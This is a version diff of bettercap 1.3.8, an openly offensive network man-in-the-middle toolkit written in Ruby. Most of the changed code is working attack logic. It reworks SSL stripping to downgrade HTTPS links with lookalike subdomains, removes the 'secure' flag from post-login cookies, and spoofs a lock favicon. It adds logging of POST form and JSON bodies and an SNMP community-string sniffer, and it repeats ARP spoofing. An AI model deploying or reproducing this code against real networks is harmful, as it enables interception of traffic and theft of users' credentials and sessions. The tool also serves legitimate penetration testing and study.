bettercap 1.3.7 → 1.3.8

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA1:
-  metadata.gz: 48a0d8e69cf95056c2e4d9e12b36a55b074da94b
-  data.tar.gz: 849f6961e569a94299e0cf6f69ac825a8d4df2fa
+  metadata.gz: 97b1b49dc607820e776704bce9ca73d9bcb55b0b
+  data.tar.gz: 194f31c34fecf4695f9b7a5728cebcab3a1bc0f2
 SHA512:
-  metadata.gz: d040cd73c42769b985ec53ea197bcb6d580567fe87654ad40b3593d7761818c34bf2e42582f58686fe466ccdd6154742c6966f454e688b1e6a5db1e11b2d4a99
-  data.tar.gz: ce9367914282abe8c0b48a5bec0216c4dc7481ab4eab249be69eea2c7069473a1a1ab6da4b73b8eb39b95f95905e1ddacf2b4bdf38c8feef899724685b4d6dc1
+  metadata.gz: f2eff4d44d1e1db62e406de421c458c97e9a8cba55d554ad2465d7cb019b488f8e961f8e5a304865c8e9a390df343cddb32d87585a99979d1279d4a832cc1498
+  data.tar.gz: 24249e328e6ffb0a082d7058d0aacdaa6c75fdec75e820274d266f0f41a6686c781b4a91141fa52aa2bf9b6a1caf935ec6b5880ec42b6f4f7c95dd2087d078d5

data/lib/bettercap.rb

@@ -27,7 +27,7 @@ require 'uri'
 Object.send :remove_const, :Config rescue nil
 Config = RbConfig
 
-def autoload( path = '' )
+def bettercap_autoload( path = '' )
   dir = File.dirname(__FILE__) + "/bettercap/#{path}"
   deps = []
   files = []
@@ -47,7 +47,6 @@ def autoload( path = '' )
   ( deps + files ).each do |file|
     require file
   end
-
 end
 
-autoload
+bettercap_autoload

data/lib/bettercap/context.rb

@@ -60,7 +60,7 @@ class Context
       iface = PCAPRUB::Pcap.lookupdev
     rescue Exception => e
       iface = nil
-      Logger.debug e.message
+      Logger.exception e
     end
 
     @running         = true
@@ -156,6 +156,10 @@ class Context
     end
   end
 
+  def post_sniffer_enabled?
+    ( @options.sniffer and @options.parsers.include?('POST') )
+  end
+
   # Stop every running daemon that was started and reset system state.
   def finalize
     @running = false
@@ -196,7 +200,7 @@ class Context
 
   # Apply needed BetterCap::Firewalls::Redirection objects.
   def enable_port_redirection!
-    @redirections = @options.to_redirections @ifconfig
+    @redirections = @options.get_redirections(@ifconfig)
     @redirections.each do |r|
       Logger.debug "Redirecting #{r.protocol} traffic from port #{r.src_port} to #{r.dst_address}:#{r.dst_port}"
       @firewall.add_port_redirection( r )
@@ -231,6 +235,8 @@ class Context
               end
             rescue Exception => e
               Logger.warn "Error with proxy module: #{e.message}"
+              Logger.exception e
+
               response = original
             end
           end

data/lib/bettercap/logger.rb

@@ -37,6 +37,20 @@ module Logger
       @@ctx       = Context.get
     end
 
+    # Log the exception +e+, if this is a beta version, log it as a warning,
+    # otherwise as a debug message.
+    def exception(e)
+      msg = "Exception : #{e.class}\n" +
+            "Message   : #{e.message}\n" +
+            "Backtrace :\n\n    #{e.backtrace.join("\n    ")}\n"
+
+      if BetterCap::VERSION.end_with?('b')
+        self.warn(msg)
+      else
+        self.debug(msg)
+      end
+    end
+
     # Log an error +message+.
     def error(message)
       @@queue.push formatted_message(message, 'E').red

data/lib/bettercap/network/protos/snmp.rb

@@ -0,0 +1,49 @@
+# encoding: UTF-8
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+SNMP network protos:
+  Author : Matteo Cantoni
+  Email  : matteo.cantoni@nothink.org
+
+This project is released under the GPL 3 license.
+
+Todo:
+  - add SNMPv1 PDU structure
+  - add SNMPv2 support
+
+=end
+
+module BetterCap
+module Network
+module Protos
+module SNMP
+
+# https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol
+# http://docwiki.cisco.com/wiki/Simple_Network_Management_Protocol
+class Packet < Network::Protos::Base
+
+  #0000   30 29 02 01 00 04 06 70 75 62 6c 69 63 a1 1c 02
+  #0010   04 36 eb 8d d1 02 01 00 02 01 00 30 0e 30 0c 06
+  #0020   08 2b 06 01 02 01 01 01 00 05 00
+
+  uint16  :snmp_asn_decode			                    # 30 29
+
+  uint8   :snmp_version_type			                    # 02 
+  uint8   :snmp_version_length			                    # 01 
+  uint8   :snmp_version_number			                    # 00
+
+  uint8   :snmp_community_type			                    # 04
+  uint8   :snmp_community_length		                    # 06
+  bytes   :snmp_community_string,  :size => :snmp_community_length  # 70 75 62 6c 69 63
+end
+
+end
+end
+end
+end

data/lib/bettercap/options.rb

@@ -184,7 +184,7 @@ class Options
       end
 
       opts.on( '--ignore ADDRESS1,ADDRESS2', 'Ignore these addresses if found while searching for targets.' ) do |v|
-        ctx.options.ignore = v
+        ctx.options.parse_ignore!(v)
       end
 
       opts.on( '-O', '--log LOG_FILE', 'Log all messages into a file, if not specified the log messages will be only print into the shell.' ) do |v|
@@ -269,11 +269,11 @@ class Options
       end
 
       opts.on( '--http-ports PORT1,PORT2', 'Comma separated list of HTTP ports to redirect to the proxy, default to ' + ctx.options.http_ports.join(', ') + ' .' ) do |v|
-        ctx.options.http_ports = v
+        ctx.options.http_ports = ctx.options.parse_ports( v )
       end
 
       opts.on( '--https-ports PORT1,PORT2', 'Comma separated list of HTTPS ports to redirect to the proxy, default to ' + ctx.options.https_ports.join(', ') + ' .' ) do |v|
-        ctx.options.https_ports = v
+        ctx.options.https_ports = ctx.options.parse_ports( v )
       end
 
       opts.on( '--proxy-https-port PORT', 'Set HTTPS proxy port, default to ' + ctx.options.proxy_https_port.to_s + ' .' ) do |v|
@@ -293,7 +293,7 @@ class Options
       end
 
       opts.on( '--custom-proxy ADDRESS', 'Use a custom HTTP upstream proxy instead of the builtin one.' ) do |v|
-        ctx.options.custom_proxy = v
+        ctx.options.parse_custom_proxy!(v)
       end
 
       opts.on( '--custom-proxy-port PORT', 'Specify a port for the custom HTTP upstream proxy, default to ' + ctx.options.custom_proxy_port.to_s + ' .' ) do |v|
@@ -305,7 +305,7 @@ class Options
       end
 
       opts.on( '--custom-https-proxy ADDRESS', 'Use a custom HTTPS upstream proxy instead of the builtin one.' ) do |v|
-        ctx.options.custom_https_proxy = v
+        ctx.options.parse_custom_proxy!( v, true )
       end
 
       opts.on( '--custom-https-proxy-port PORT', 'Specify a port for the custom HTTPS upstream proxy, default to ' + ctx.options.custom_https_proxy_port.to_s + ' .' ) do |v|
@@ -374,7 +374,7 @@ class Options
     end
 
     unless ctx.options.target.nil?
-      ctx.targets = ctx.options.to_targets
+      ctx.targets = ctx.options.parse_targets
     end
 
     # Load firewall instance, network interface informations and detect the
@@ -382,7 +382,7 @@ class Options
     ctx.update!
 
     # Spoofers need the context network data to be initialized.
-    ctx.spoofer = ctx.options.to_spoofers
+    ctx.spoofer = ctx.options.parse_spoofers
 
     ctx
   end
@@ -412,9 +412,11 @@ class Options
     !@ignore.nil? and @ignore.include?(ip)
   end
 
+  # Parsing Routines
+
   # Setter for the #ignore attribute, will raise a BetterCap::Error if one
   # or more invalid IP addresses are specified.
-  def ignore=(value)
+  def parse_ignore!(value)
     @ignore = value.split(",")
     valid = @ignore.select { |target| Network.is_ip?(target) }
 
@@ -430,23 +432,20 @@ class Options
     Logger.warn "Ignoring #{valid.join(", ")} ."
   end
 
-  # Setter for the #custom_proxy attribute, will raise a BetterCap::Error if
-  # +value+ is not a valid IP address.
-  def custom_proxy=(value)
-    @custom_proxy = value
-    raise BetterCap::Error, 'Invalid custom HTTP upstream proxy address specified.' unless Network.is_ip? @custom_proxy
-  end
-
-  # Setter for the #custom_https_proxy attribute, will raise a BetterCap::Error if
-  # +value+ is not a valid IP address.
-  def custom_https_proxy=(value)
-    @custom_https_proxy = value
-    raise BetterCap::Error, 'Invalid custom HTTPS upstream proxy address specified.' unless Network.is_ip? @custom_https_proxy
+  # Setter for the #custom_proxy or #custom_https_proxy attribute, will raise a
+  # BetterCap::Error if +value+ is not a valid IP address.
+  def parse_custom_proxy!(value, https=false)
+    raise BetterCap::Error, 'Invalid custom HTTP upstream proxy address specified.' unless Network.is_ip?(value)
+    if https
+      @custom_proxy = value
+    else
+      @custom_https_proxy = value
+    end
   end
 
   # Parse a comma separated list of ports and return an array containing only
   # valid ports, raise BetterCap::Error if that array is empty.
-  def to_ports(value)
+  def parse_ports(value)
     ports = []
     value.split(",").each do |v|
       v = v.strip.to_i
@@ -458,21 +457,9 @@ class Options
     ports
   end
 
-  # Setter for the #http_ports attribute, will raise a BetterCap::Error if +value+
-  # is not a valid comma separated list of ports.
-  def http_ports=(value)
-    @http_ports = to_ports(value)
-  end
-
-  # Setter for the #https_ports attribute, will raise a BetterCap::Error if +value+
-  # is not a valid comma separated list of ports.
-  def https_ports=(value)
-    @https_ports = to_ports(value)
-  end
-
   # Split specified targets and parse them ( either as IP or MAC ), will raise a
   # BetterCap::Error if one or more invalid addresses are specified.
-  def to_targets
+  def parse_targets
     targets = @target.split(",")
     valid_targets = targets.select { |target| Network.is_ip?(target) or Network.is_mac?(target) }
 
@@ -488,7 +475,7 @@ class Options
 
   # Parse spoofers and return a list of BetterCap::Spoofers objects. Raise a
   # BetterCap::Error if an invalid spoofer name was specified.
-  def to_spoofers
+  def parse_spoofers
     spoofers = []
     spoofer_modules_names = @spoofer.split(",")
     spoofer_modules_names.each do |module_name|
@@ -504,7 +491,7 @@ class Options
 
   # Create a list of BetterCap::Firewalls::Redirection objects which are needed
   # given the specified command line arguments.
-  def to_redirections ifconfig
+  def get_redirections ifconfig
     redirections = []
 
     if @dnsd

data/lib/bettercap/proxy/modules/injectcss.rb

@@ -56,7 +56,7 @@ class InjectCSS < BetterCap::Proxy::Module
   def on_request( request, response )
     # is it a html page?
     if response.content_type =~ /^text\/html.*/
-      BetterCap::Logger.info "Injecting CSS #{if @@cssdata.nil? then "URL" else "file" end} into http://#{request.host}#{request.url}"
+      BetterCap::Logger.info "[#{'INJECTCSS'.green}] Injecting CSS #{if @@cssdata.nil? then "URL" else "file" end} into http://#{request.host}#{request.url}"
       # inject URL
       if @@cssdata.nil?
         response.body.sub!( '</head>', "  <link rel=\"stylesheet\" href=\"#{@cssurl}\"></script></head>" )

data/lib/bettercap/proxy/modules/injecthtml.rb

@@ -44,7 +44,7 @@ class InjectHTML < BetterCap::Proxy::Module
   def on_request( request, response )
     # is it a html page?
     if response.content_type =~ /^text\/html.*/
-      BetterCap::Logger.info "Injecting HTML code into http://#{request.host}#{request.url}"
+      BetterCap::Logger.info "[#{'INJECTHTML'.green}] Injecting HTML code into http://#{request.host}#{request.url}"
 
       if @@data.nil?
         response.body.sub!( '</body>', "<iframe src=\"#{@@iframe}\" frameborder=\"0\" height=\"0\" width=\"0\"></iframe></body>" )

data/lib/bettercap/proxy/modules/injectjs.rb

@@ -56,7 +56,7 @@ class InjectJS < BetterCap::Proxy::Module
   def on_request( request, response )
     # is it a html page?
     if response.content_type =~ /^text\/html.*/
-      BetterCap::Logger.info "Injecting javascript #{if @@jsdata.nil? then "URL" else "file" end} into http://#{request.host}#{request.url}"
+      BetterCap::Logger.info "[#{'INJECTJS'.green}] Injecting javascript #{if @@jsdata.nil? then "URL" else "file" end} into http://#{request.host}#{request.url}"
       # inject URL
       if @@jsdata.nil?
         response.body.sub!( '</head>', "<script src=\"#{@@jsurl}\" type=\"text/javascript\"></script></head>" )

data/lib/bettercap/proxy/proxy.rb

@@ -121,8 +121,11 @@ class Proxy
 
       request.read(client)
 
+      # stripped request
+      if @streamer.was_stripped?( request, client )
+        @streamer.handle( request, client )
       # someone is having fun with us =)
-      if is_self_request? request
+      elsif is_self_request? request
         @streamer.rickroll( client, @is_https )
       # handle request
       else
@@ -131,11 +134,14 @@ class Proxy
 
       Logger.debug "#{@type} client served."
 
+    rescue SocketError => se
+      Logger.debug "Socket error while serving client: #{e.message}"
+      Logger.exception e
+    rescue Errno::EPIPE => ep
+      Logger.debug "Connection closed while serving client."
     rescue Exception => e
-      if request.host
-        Logger.warn "Error while serving #{request.host}#{request.url}: #{e.message}"
-        Logger.debug e.backtrace.join("\n")
-      end
+      Logger.warn "Error while serving client: #{e.message}"
+      Logger.exception e
     end
 
     client.close

data/lib/bettercap/proxy/request.rb

@@ -143,11 +143,18 @@ class Request
     @lines.join("\n") + "\n" + ( @body || '' )
   end
 
+  def base_url
+    schema = if port == 443 then 'https' else 'http' end
+    "#{schema}://#{@host}/"
+  end
+
   # Return the full request URL trimming it at +max_length+ characters.
   def to_url(max_length = 50)
     schema = if port == 443 then 'https' else 'http' end
     url = "#{schema}://#{@host}#{@url}"
-    url = url.slice(0..max_length) + '...' unless url.length <= max_length
+    unless max_length.nil?
+      url = url.slice(0..max_length) + '...' unless url.length <= max_length
+    end
     url
   end
 
@@ -174,10 +181,16 @@ class Request
       end
     end
 
+    if name == 'Host'
+      @host = value
+    end
+
     if !found and !value.nil?
       @headers[name] = value
       @lines << "#{name}: #{value}"
     end
+
+    @lines.reject!(&:empty?)
   end
 end
 end

data/lib/bettercap/proxy/response.rb

@@ -24,7 +24,7 @@ class Response
   # True if this is a chunked encoded response, otherwise false.
   attr_reader :chunked
   # A list of response headers.
-  attr_reader :headers
+  attr_accessor :headers
   # Response status code.
   attr_accessor :code
   # True if the parser finished to parse the headers, otherwise false.
@@ -81,7 +81,15 @@ class Response
   def convert_webrick_response!(response)
     self << "HTTP/#{response.http_version} #{response.code} #{response.msg}"
     response.each do |key,value|
-      self << "#{key.gsub(/\bwww|^te$|\b\w/){ $&.upcase }}: #{value}"
+      # sometimes webrick joins all 'set-cookie' headers
+      # which might cause issues with HSTS bypass.
+      if key == 'set-cookie'
+        response.get_fields('set-cookie').each do |v|
+          self << "Set-Cookie: #{v}"
+        end
+      else
+        self << "#{key.gsub(/\bwww|^te$|\b\w/){ $&.upcase }}: #{value}"
+      end
     end
     self << "\n"
     @code = response.code
@@ -158,6 +166,14 @@ class Response
     end
   end
 
+  def each_header(name)
+    @headers.each_with_index do |header,i|
+      if header =~ /^#{name}:\s*(.+)$/i
+        yield( $1, i )
+      end
+    end
+  end
+
   # Return a string representation of this response object, patching the
   # Content-Length header if the #body was modified.
   def to_s

data/lib/bettercap/proxy/sslstrip/cookiemonitor.rb

@@ -22,6 +22,10 @@ class CookieMonitor
     @set = []
   end
 
+  def add!(request)
+    @set << [request.client, get_domain(request)]
+  end
+
   # Return true if the +request+ was already cleaned.
   def is_clean?(request)
     if request.post?

data/lib/bettercap/proxy/sslstrip/strip.rb

@@ -15,6 +15,73 @@ module BetterCap
 module Proxy
 module SSLStrip
 
+# Represent a stripped url associated to the client that requested it.
+class StrippedObject
+  # The stripped request client address.
+  attr_accessor :client
+  # The original URL.
+  attr_accessor :original
+  # The stripped version of the URL.
+  attr_accessor :stripped
+
+  # Known subdomains to replace.
+  SUBDOMAIN_REPLACES = {
+    'www'     => 'wwwww',
+    'webmail' => 'wwebmail',
+    'mail'    => 'wmail'
+  }.freeze
+
+  # Create an instance with the given arguments.
+  def initialize( client, original, stripped )
+    @client   = client
+    @original = original
+    @stripped = stripped
+  end
+
+  # Return a normalized version of +url+.
+  def self.normalize( url, schema = 'https' )
+    # add schema if needed
+    unless url.include?('://')
+      url = "#{schema}://#{url}"
+    end
+    # add path if needed
+    unless url.end_with?('/')
+      url = "#{url}/"
+    end
+    url
+  end
+
+  # Downgrade +url+ from HTTPS to HTTP.
+  # Will take care of HSTS bypass urls in a near future.
+  def self.strip( url )
+    # first thing first, downgrade the protocol schema
+    stripped = url.gsub( 'https://', 'http://' )
+    # search for a known subdomain and replace it
+    found = false
+    SUBDOMAIN_REPLACES.each do |from,to|
+      if stripped.include?( "://#{from}." )
+        stripped = stripped.gsub( "://#{from}.", "://#{to}." )
+        found = true
+        break
+      end
+    end
+    # fallback, prepend custom 'wwwww.'
+    unless found
+      stripped.gsub!( '://', '://wwwww.' )
+    end
+
+    Logger.debug  "[#{'SSLSTRIP'.green} '#{url}' -> '#{stripped}'"
+
+    stripped
+  end
+
+  def self.process( url )
+    normalized = self.normalize(url)
+    stripped   = self.strip(normalized)
+    [ normalized, stripped ]
+  end
+end
+
 # Handle SSL stripping.
 class Strip
   # Maximum number of redirects to detect a HTTPS redirect loop.
@@ -24,9 +91,29 @@ class Strip
 
   # Create an instance of this object.
   def initialize
-    @urls    = URLMonitor.new
-    @cookies = CookieMonitor.new
-    @favicon = Response.from_file( File.dirname(__FILE__) + '/lock.ico', 'image/x-icon' )
+    @stripped = []
+    @cookies  = CookieMonitor.new
+    @favicon  = Response.from_file( File.dirname(__FILE__) + '/lock.ico', 'image/x-icon' )
+  end
+
+  # Return true if the +request+ was stripped.
+  def was_stripped?(request)
+    url = request.base_url
+    @stripped.each do |s|
+      if s.client == request.client and s.stripped == url
+        return true
+      end
+    end
+    false
+  end
+
+  def unstrip( request, url )
+    @stripped.each do |s|
+      if s.client == request.client and s.stripped == url
+        return s.original
+      end
+    end
+    url
   end
 
   # Check if the +request+ is a result of a stripped link/redirect and handle
@@ -86,18 +173,30 @@ class Strip
   # If the +request+ is a result of a sslstripping operation,
   # proxy it via SSL.
   def process_stripped!(request)
-    # check for stripped urls.
-    link = @urls.normalize( request.host )
-    if request.port == 80 and @urls.was_stripped?( request.client, link )
-      Logger.debug "[#{'SSLSTRIP'.green} #{request.client}] Found stripped HTTPS link '#{link}', proxying via SSL."
+    if request.port == 80 and was_stripped?(request)
+      # i.e: wwww.facebook.com
+      stripped   = request['Host']
+      # i.e: http://wwww.facebook.com/
+      url        = StrippedObject.normalize( stripped, 'http' )
+      # i.e: www.facebook.com
+      unstripped = unstrip( request, url ).gsub( 'https://', '' ).gsub('/', '' )
+
+      # loop each header and fix the stripped url if needed,
+      # this will fix headers such as Host, Referer, Origin, etc.
+      request.headers.each do |name,value|
+        if value.include?(stripped)
+          request[name] = value.gsub( stripped, unstripped ).gsub( 'http://', 'https://')
+        end
+      end
       request.port = 443
+
+      Logger.info "[#{'SSLSTRIP'.green} #{request.client}] Found stripped HTTPS link '#{url}', proxying via SSL ( #{request.to_url} )."
     end
   end
 
   # If +request+ is the favicon of a stripped host, send our spoofed lock icon.
   def spoof_favicon!(request)
-    link = @urls.normalize( request.host )
-    if @urls.was_stripped?( request.client, link ) and is_favicon?(request)
+    if was_stripped?(request) and is_favicon?(request)
       Logger.info "[#{'SSLSTRIP'.green} #{request.client}] Sending spoofed favicon '#{request.to_url }'."
       return @favicon
     end
@@ -114,17 +213,34 @@ class Strip
   def process_redirection!(request,response)
     # check for a redirect
     if response['Location'].start_with?('https://')
-      link = @urls.normalize( response['Location'] )
-      Logger.info "[#{'SSLSTRIP'.green} #{request.client}] Found redirect to HTTPS '#{link}'."
-      @urls.add!( request.client, link )
+      original, stripped = StrippedObject.process( response['Location'] )
+
+      @stripped << StrippedObject.new( request.client, original, stripped )
 
-      # The request will be retried on port 443 if MAX_REDIRECTS is not reached.
-      request.port = 443
       # If MAX_REDIRECTS is reached, the 'Location' header will be used.
-      response['Location'] = @urls.downgrade( response['Location'] )
+      response['Location'] = stripped
 
-      # retry the request if possible
-      return true
+      # no cookies set, just a normal http -> https redirect
+      if response['Set-Cookie'].empty?
+        Logger.info "[#{'SSLSTRIP'.green} #{request.client}] Found redirect to HTTPS '#{original}' -> '#{stripped}'."
+
+        # The request will be retried on port 443 if MAX_REDIRECTS is not reached.
+        request.port = 443
+        # retry the request if possible
+        return true
+      # cookies set, this is probably a redirect after a login.
+      else
+        Logger.info "[#{'SSLSTRIP'.green} #{request.client}] Found redirect to HTTPS ( with cookies ) '#{original}' -> '#{stripped}'."
+        # we know this session, do not kill it!
+        @cookies.add!( request )
+        # remove the 'secure' descriptor from every cookie
+        response.each_header('Set-Cookie') do |value,i|
+          response.headers[i] = "Set-Cookie: #{value.gsub( /secure/, '' )}"
+        end
+
+        # do not retry request
+        return false
+      end
     end
     false
   end
@@ -136,22 +252,19 @@ class Strip
     begin
       response.body.scan( HTTPS_URL_RE ).uniq.each do |link|
         if link[0].include?('.')
-          link       = @urls.normalize( link[0] )
-          downgraded = @urls.downgrade( link )
-
-          links << [link, downgraded]
+          links << StrippedObject.process( link[0] )
         end
       end
     # handle errors due to binary content
     rescue; end
 
     unless links.empty?
-      Logger.info "[#{'SSLSTRIP'.green} #{request.client}] Stripping #{links.size} HTTPS link#{if links.size > 1 then 's' else '' end} inside '#{request.to_url}'."
+      Logger.debug "[#{'SSLSTRIP'.green} #{request.client}] Stripping #{links.size} HTTPS link#{if links.size > 1 then 's' else '' end} inside '#{request.to_url}'."
 
       links.each do |l|
-        link, downgraded = l
-        @urls.add!( request.client, link )
-        response.body.gsub!( link, downgraded )
+        original, stripped = l
+        @stripped << StrippedObject.new( request.client, original, stripped )
+        response.body.gsub!( original, stripped )
       end
     end
   end

data/lib/bettercap/proxy/stream_logger.rb

@@ -10,7 +10,9 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'bettercap/logger'
+require 'zlib'
+require 'stringio'
+require 'json'
 
 module BetterCap
 # Raw or http streams pretty logging.
@@ -30,18 +32,16 @@ class StreamLogger
   # its compact string representation ( @see BetterCap::Target#to_s_compact ).
   def self.addr2s( addr, alt = nil )
     ctx = Context.get
-
+    # check for the local address
     return 'local' if addr == ctx.ifconfig[:ip_saddr]
-
+    # is it a known target?
     target = ctx.find_target addr, nil
     return target.to_s_compact unless target.nil?
-
-    if addr == '0.0.0.0' and !alt.nil?
-      return alt
-    elsif addr == '255.255.255.255'
-      return '*'
-    end
-
+    # fix 0.0.0.0 if alt argument was specified
+    return alt if addr == '0.0.0.0' and !alt.nil?
+    # fix broadcast -> *
+    return '*' if addr == '255.255.255.255'
+    # nothing found, return the address as it is
     addr
   end
 
@@ -74,21 +74,82 @@ class StreamLogger
     to    = self.addr2s( pkt.ip_daddr, pkt.eth2s(:dst) )
 
     if pkt.respond_to?('tcp_dst')
-      to += ':' + self.service( :tcp, pkt.tcp_dst ).to_s
+      to += ':' + self.service( :tcp, pkt.tcp_dst ).to_s.light_blue
     elsif pkt.respond_to?('udp_dst')
-      to += ':' + self.service( :udp, pkt.udp_dst ).to_s
+      to += ':' + self.service( :udp, pkt.udp_dst ).to_s.light_blue
     end
 
     Logger.raw( "[#{from} > #{to}] [#{label.green}]#{nl}#{payload.strip}" )
   end
 
+  def self.dump_form( request )
+    msg = ''
+    request.body.split('&').each do |v|
+      name, value = v.split('=')
+      name ||= ''
+      value ||= ''
+      msg << "  #{name.blue} : #{URI.unescape(value).yellow}\n"
+    end
+    msg
+  end
+
+  def self.dump_raw( data )
+    msg = ''
+    data.each_byte do |b|
+      msg << ( b.chr =~ /[[:print:]]/ ? b.chr : '.' ).yellow
+    end
+    msg
+  end
+
+  def self.dump_gzip( request )
+    msg = ''
+    uncompressed = Zlib::GzipReader.new(StringIO.new(request.body)).read
+    self.dump_raw( uncompressed )
+  end
+
+  def self.dump_json( request )
+    obj = JSON.parse( request.body )
+    json = JSON.pretty_unparse(obj)
+    json.scan( /("[^"]+"):/ ).map { |x| json.gsub!( x[0], x[0].blue )}
+    json
+  end
+
+  # If +request+ is a complete POST request, this method will log every header
+  # and post field with its value.
+  def self.log_post( request )
+    # the packet could be incomplete
+    if request.post? and !request.body.nil? and !request.body.empty?
+      msg = "\n[#{'HEADERS'.green}]\n\n"
+      request.headers.each do |name,value|
+        msg << "  #{name.blue} : #{value.yellow}\n"
+      end
+      msg << "\n[#{'BODY'.green}]\n\n"
+
+      case request['Content-Type']
+      when 'application/x-www-form-urlencoded'
+        msg << self.dump_form( request )
+
+      when 'gzip'
+        msg << self.dump_gzip( request )
+
+      when 'application/json'
+        msg << self.dump_json( request )
+
+      else
+        msg << self.dump_raw( request.body )
+      end
+
+      Logger.raw "#{msg}\n"
+    end
+  end
+
   # Log a HTTP ( HTTPS if +is_https+ is true ) stream performed by the +client+
   # with the +request+ and +response+ most important informations.
   def self.log_http( request, response )
     is_https   = request.port == 443
     request_s  = "#{is_https ? 'https' : 'http'}://#{request.host}#{request.url}"
     response_s = "( #{response.content_type} )"
-    request_s  = request_s.slice(0..@@MAX_REQ_SIZE) + '...' unless request_s.length <= @@MAX_REQ_SIZE
+    request_s  = request.to_url( request.post?? nil : @@MAX_REQ_SIZE )
     code       = response.code[0]
 
     if @@CODE_COLORS.has_key? code
@@ -98,6 +159,10 @@ class StreamLogger
     end
 
     Logger.raw "[#{self.addr2s(request.client)}] #{request.verb.light_blue} #{request_s} #{response_s}"
+    # Log post body if the POST sniffer is enabled.
+    if Context.get.post_sniffer_enabled?
+      self.log_post( request )
+    end
   end
 end
 end

data/lib/bettercap/proxy/streamer.rb

@@ -23,6 +23,15 @@ class Streamer
     @sslstrip  = SSLStrip::Strip.new
   end
 
+  # Return true if the +request+ was stripped.
+  def was_stripped?(request, client)
+    if @ctx.options.sslstrip
+      request.client, request.client_port = get_client_details( !( request.port == 443 ), client )
+      return @sslstrip.was_stripped?(request)
+    end
+    false
+  end
+
   # Redirect the +client+ to a funny video.
   def rickroll( client, is_https )
     client_ip, client_port = get_client_details( is_https, client )
@@ -79,8 +88,7 @@ class Streamer
       client.write response.to_s
     rescue NoMethodError => e
       Logger.warn "Could not handle #{request.verb} request from #{request.client}:#{request.client_port} ..."
-      Logger.debug e.inspect
-      Logger.debug e.backtrace.join("\n")
+      Logger.exception e
     end
   end
 

data/lib/bettercap/sniffer/parsers/post.rb

@@ -22,23 +22,8 @@ class Post < Base
         req = BetterCap::Proxy::Request.parse(pkt.payload)
         # the packet could be incomplete
         unless req.body.nil? or req.body.empty?
-          msg = "\n[#{'HEADERS'.green}]\n\n"
-          req.headers.each do |name,value|
-            msg << "  #{name.blue} : #{value.yellow}\n"
-          end
-          msg << "\n[#{'BODY'.green}]\n\n"
-
-          req.body.split('&').each do |v|
-            name, value = v.split('=')
-            if name.nil? or value.nil?
-              msg << "  #{URI.unescape(v).yellow}\n"
-            else
-              msg << "  #{name.blue} : #{URI.unescape(value).yellow}\n"
-            end
-          end
-
           StreamLogger.log_raw( pkt, "POST", req.to_url(1000) )
-          Logger.raw "#{msg}\n"
+          StreamLogger.log_post( req )
         end
       rescue; end
     end

data/lib/bettercap/sniffer/parsers/snmp.rb

@@ -0,0 +1,44 @@
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+SNMP community string parser:
+  Author : Matteo Cantoni
+  Email  : matteo.cantoni@nothink.org
+
+This project is released under the GPL 3 license.
+
+Todo: SNMPv2
+
+=end
+
+module BetterCap
+module Parsers
+# SNMP community string parser.
+class SNMP < Base
+  def on_packet( pkt )
+    begin
+      if pkt.udp_dst == 161
+
+        packet = Network::Protos::SNMP::Packet.parse( pkt.payload )
+        unless packet.nil?
+        	if packet.snmp_version_number.to_i == 0
+        	  snmp_version = 'v1'
+        	else
+        	  snmp_version = 'n/a'
+        	end
+
+          msg = "[#{'Version:'.green} #{snmp_version}] [#{'Community:'.green} #{packet.snmp_community_string.map { |x| x.chr }.join.yellow}]"
+
+          StreamLogger.log_raw( pkt, 'SNMP', msg )
+        end
+      end
+    rescue; end
+  end
+end
+end
+end

data/lib/bettercap/sniffer/sniffer.rb

@@ -29,33 +29,38 @@ class Sniffer
   # each one of them to the BetterCap::Parsers instances loaded inside the
   # +ctx+ BetterCap::Context instance.
   def self.start( ctx )
-    Thread.new do
+    Thread.new {
       Logger.debug 'Starting sniffer ...'
 
       setup( ctx )
 
+      start     = Time.now.to_i
+      skipped   = 0
+      processed = 0
+
       self.stream.each do |raw_packet|
         break unless @@ctx.running
         begin
           parsed = PacketFu::Packet.parse(raw_packet)
         rescue Exception => e
           parsed = nil
-          #Logger.debug e.message
-          #Logger.debug e.backtrace.join("\n")
         end
 
-        if not parsed.nil? and parsed.is_ip? and !skip_packet?(parsed)
-          Logger.debug "Parsing packet ..."
+        if skip_packet?(parsed)
+          skipped += 1
+        else
+          processed += 1
           append_packet raw_packet
           parse_packet parsed
-        else
-          Logger.debug "[SNIFFER] Skipping packet:" \
-                       " parsed=#{parsed.nil?? 'false' : 'true'}" \
-                       " is_ip?=#{parsed.nil?? 'false' : parsed.is_ip?}" \
-                       " skip_packet?=#{parsed.nil?? 'true' : skip_packet?(parsed)}"
         end
       end
-    end
+
+      stop = Time.now.to_i
+      delta = stop - start
+      total = skipped + processed
+
+      Logger.info "[#{'SNIFFER'.green}] #{total} packets processed in #{delta} s ( #{skipped} skipped packets, #{processed} processed packets )"
+    }
   end
 
   private
@@ -74,9 +79,14 @@ class Sniffer
   # Return true if the +pkt+ packet instance must be skipped.
   def self.skip_packet?( pkt )
     begin
-      !@@ctx.options.local and
-          ( pkt.ip_saddr == @@ctx.ifconfig[:ip_saddr] or
-              pkt.ip_daddr == @@ctx.ifconfig[:ip_saddr] )
+      # not parsed
+      return true if pkt.nil?
+      # not IP packet
+      return true unless pkt.is_ip?
+      # skip if local packet and --local|-L was not specified.
+      unless @@ctx.options.local
+        return ( pkt.ip_saddr == @@ctx.ifconfig[:ip_saddr] or pkt.ip_daddr == @@ctx.ifconfig[:ip_saddr] )
+      end
     rescue; end
     false
   end
@@ -87,7 +97,7 @@ class Sniffer
       begin
         parser.on_packet parsed
       rescue Exception => e
-        Logger.debug e.message
+        Logger.exception e
       end
     end
   end
@@ -100,7 +110,7 @@ class Sniffer
           array: [p],
           append: true ) unless @@pcap.nil?
     rescue Exception => e
-      Logger.warn e.message
+      Logger.exception e
     end
   end
 

data/lib/bettercap/spoofers/arp.rb

@@ -81,7 +81,10 @@ class Arp < Base
 
     @ctx.targets.each do |target|
       unless target.ip.nil? or target.mac.nil?
-        spoof(target)
+        5.times do 
+          spoof(target)
+          sleep 0.3
+        end
       end
     end
   end

data/lib/bettercap/version.rb

@@ -12,7 +12,7 @@ This project is released under the GPL 3 license.
 =end
